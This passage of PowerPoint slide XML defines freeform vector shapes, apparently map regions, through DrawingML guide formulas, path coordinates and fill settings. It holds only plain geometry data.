                  <a:gd name="T44" fmla="*/ 130 w 190"/>
                  <a:gd name="T45" fmla="*/ 161 h 218"/>
                  <a:gd name="T46" fmla="*/ 120 w 190"/>
                  <a:gd name="T47" fmla="*/ 172 h 218"/>
                  <a:gd name="T48" fmla="*/ 117 w 190"/>
                  <a:gd name="T49" fmla="*/ 183 h 218"/>
                  <a:gd name="T50" fmla="*/ 111 w 190"/>
                  <a:gd name="T51" fmla="*/ 204 h 218"/>
                  <a:gd name="T52" fmla="*/ 92 w 190"/>
                  <a:gd name="T53" fmla="*/ 202 h 218"/>
                  <a:gd name="T54" fmla="*/ 79 w 190"/>
                  <a:gd name="T55" fmla="*/ 205 h 218"/>
                  <a:gd name="T56" fmla="*/ 69 w 190"/>
                  <a:gd name="T57" fmla="*/ 203 h 218"/>
                  <a:gd name="T58" fmla="*/ 57 w 190"/>
                  <a:gd name="T59" fmla="*/ 201 h 218"/>
                  <a:gd name="T60" fmla="*/ 38 w 190"/>
                  <a:gd name="T61" fmla="*/ 218 h 218"/>
                  <a:gd name="T62" fmla="*/ 26 w 190"/>
                  <a:gd name="T63" fmla="*/ 200 h 218"/>
                  <a:gd name="T64" fmla="*/ 17 w 190"/>
                  <a:gd name="T65" fmla="*/ 180 h 218"/>
                  <a:gd name="T66" fmla="*/ 18 w 190"/>
                  <a:gd name="T67" fmla="*/ 160 h 218"/>
                  <a:gd name="T68" fmla="*/ 11 w 190"/>
                  <a:gd name="T69" fmla="*/ 148 h 218"/>
                  <a:gd name="T70" fmla="*/ 4 w 190"/>
                  <a:gd name="T71" fmla="*/ 129 h 218"/>
                  <a:gd name="T72" fmla="*/ 1 w 190"/>
                  <a:gd name="T73" fmla="*/ 124 h 218"/>
                  <a:gd name="T74" fmla="*/ 7 w 190"/>
                  <a:gd name="T75" fmla="*/ 114 h 218"/>
                  <a:gd name="T76" fmla="*/ 5 w 190"/>
                  <a:gd name="T77" fmla="*/ 98 h 218"/>
                  <a:gd name="T78" fmla="*/ 7 w 190"/>
                  <a:gd name="T79" fmla="*/ 89 h 218"/>
                  <a:gd name="T80" fmla="*/ 9 w 190"/>
                  <a:gd name="T81" fmla="*/ 75 h 218"/>
                  <a:gd name="T82" fmla="*/ 10 w 190"/>
                  <a:gd name="T83" fmla="*/ 64 h 218"/>
                  <a:gd name="T84" fmla="*/ 12 w 190"/>
                  <a:gd name="T85" fmla="*/ 50 h 218"/>
                  <a:gd name="T86" fmla="*/ 8 w 190"/>
                  <a:gd name="T87" fmla="*/ 31 h 21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90"/>
                  <a:gd name="T133" fmla="*/ 0 h 218"/>
                  <a:gd name="T134" fmla="*/ 190 w 190"/>
                  <a:gd name="T135" fmla="*/ 218 h 218"/>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90" h="218">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36119" name="Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1635" y="3100"/>
                <a:ext cx="190" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 190"/>
                  <a:gd name="T1" fmla="*/ 20 h 218"/>
                  <a:gd name="T2" fmla="*/ 26 w 190"/>
                  <a:gd name="T3" fmla="*/ 14 h 218"/>
                  <a:gd name="T4" fmla="*/ 43 w 190"/>
                  <a:gd name="T5" fmla="*/ 5 h 218"/>
                  <a:gd name="T6" fmla="*/ 59 w 190"/>
                  <a:gd name="T7" fmla="*/ 0 h 218"/>
                  <a:gd name="T8" fmla="*/ 67 w 190"/>
                  <a:gd name="T9" fmla="*/ 10 h 218"/>
                  <a:gd name="T10" fmla="*/ 68 w 190"/>
                  <a:gd name="T11" fmla="*/ 25 h 218"/>
                  <a:gd name="T12" fmla="*/ 84 w 190"/>
                  <a:gd name="T13" fmla="*/ 43 h 218"/>
                  <a:gd name="T14" fmla="*/ 95 w 190"/>
                  <a:gd name="T15" fmla="*/ 43 h 218"/>
                  <a:gd name="T16" fmla="*/ 110 w 190"/>
                  <a:gd name="T17" fmla="*/ 52 h 218"/>
                  <a:gd name="T18" fmla="*/ 119 w 190"/>
                  <a:gd name="T19" fmla="*/ 53 h 218"/>
                  <a:gd name="T20" fmla="*/ 126 w 190"/>
                  <a:gd name="T21" fmla="*/ 61 h 218"/>
                  <a:gd name="T22" fmla="*/ 143 w 190"/>
                  <a:gd name="T23" fmla="*/ 63 h 218"/>
                  <a:gd name="T24" fmla="*/ 146 w 190"/>
                  <a:gd name="T25" fmla="*/ 70 h 218"/>
                  <a:gd name="T26" fmla="*/ 149 w 190"/>
                  <a:gd name="T27" fmla="*/ 98 h 218"/>
                  <a:gd name="T28" fmla="*/ 158 w 190"/>
                  <a:gd name="T29" fmla="*/ 106 h 218"/>
                  <a:gd name="T30" fmla="*/ 178 w 190"/>
                  <a:gd name="T31" fmla="*/ 106 h 218"/>
                  <a:gd name="T32" fmla="*/ 177 w 190"/>
                  <a:gd name="T33" fmla="*/ 119 h 218"/>
                  <a:gd name="T34" fmla="*/ 188 w 190"/>
                  <a:gd name="T35" fmla="*/ 128 h 218"/>
                  <a:gd name="T36" fmla="*/ 189 w 190"/>
                  <a:gd name="T37" fmla="*/ 147 h 218"/>
                  <a:gd name="T38" fmla="*/ 182 w 190"/>
                  <a:gd name="T39" fmla="*/ 164 h 218"/>
                  <a:gd name="T40" fmla="*/ 165 w 190"/>
                  <a:gd name="T41" fmla="*/ 155 h 218"/>
                  <a:gd name="T42" fmla="*/ 151 w 190"/>
                  <a:gd name="T43" fmla="*/ 156 h 218"/>
                  <a:gd name="T44" fmla="*/ 130 w 190"/>
                  <a:gd name="T45" fmla="*/ 161 h 218"/>
                  <a:gd name="T46" fmla="*/ 120 w 190"/>
                  <a:gd name="T47" fmla="*/ 172 h 218"/>
                  <a:gd name="T48" fmla="*/ 117 w 190"/>
                  <a:gd name="T49" fmla="*/ 183 h 218"/>
                  <a:gd name="T50" fmla="*/ 111 w 190"/>
                  <a:gd name="T51" fmla="*/ 204 h 218"/>
                  <a:gd name="T52" fmla="*/ 92 w 190"/>
                  <a:gd name="T53" fmla="*/ 202 h 218"/>
                  <a:gd name="T54" fmla="*/ 79 w 190"/>
                  <a:gd name="T55" fmla="*/ 205 h 218"/>
                  <a:gd name="T56" fmla="*/ 69 w 190"/>
                  <a:gd name="T57" fmla="*/ 203 h 218"/>
                  <a:gd name="T58" fmla="*/ 57 w 190"/>
                  <a:gd name="T59" fmla="*/ 201 h 218"/>
                  <a:gd name="T60" fmla="*/ 38 w 190"/>
                  <a:gd name="T61" fmla="*/ 218 h 218"/>
                  <a:gd name="T62" fmla="*/ 26 w 190"/>
                  <a:gd name="T63" fmla="*/ 200 h 218"/>
                  <a:gd name="T64" fmla="*/ 17 w 190"/>
                  <a:gd name="T65" fmla="*/ 180 h 218"/>
                  <a:gd name="T66" fmla="*/ 18 w 190"/>
                  <a:gd name="T67" fmla="*/ 160 h 218"/>
                  <a:gd name="T68" fmla="*/ 11 w 190"/>
                  <a:gd name="T69" fmla="*/ 148 h 218"/>
                  <a:gd name="T70" fmla="*/ 4 w 190"/>
                  <a:gd name="T71" fmla="*/ 129 h 218"/>
                  <a:gd name="T72" fmla="*/ 1 w 190"/>
                  <a:gd name="T73" fmla="*/ 124 h 218"/>
                  <a:gd name="T74" fmla="*/ 7 w 190"/>
                  <a:gd name="T75" fmla="*/ 114 h 218"/>
                  <a:gd name="T76" fmla="*/ 5 w 190"/>
                  <a:gd name="T77" fmla="*/ 98 h 218"/>
                  <a:gd name="T78" fmla="*/ 7 w 190"/>
                  <a:gd name="T79" fmla="*/ 89 h 218"/>
                  <a:gd name="T80" fmla="*/ 9 w 190"/>
                  <a:gd name="T81" fmla="*/ 75 h 218"/>
                  <a:gd name="T82" fmla="*/ 10 w 190"/>
                  <a:gd name="T83" fmla="*/ 64 h 218"/>
                  <a:gd name="T84" fmla="*/ 12 w 190"/>
                  <a:gd name="T85" fmla="*/ 50 h 218"/>
                  <a:gd name="T86" fmla="*/ 8 w 190"/>
                  <a:gd name="T87" fmla="*/ 31 h 21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90"/>
                  <a:gd name="T133" fmla="*/ 0 h 218"/>
                  <a:gd name="T134" fmla="*/ 190 w 190"/>
                  <a:gd name="T135" fmla="*/ 218 h 218"/>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90" h="218">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
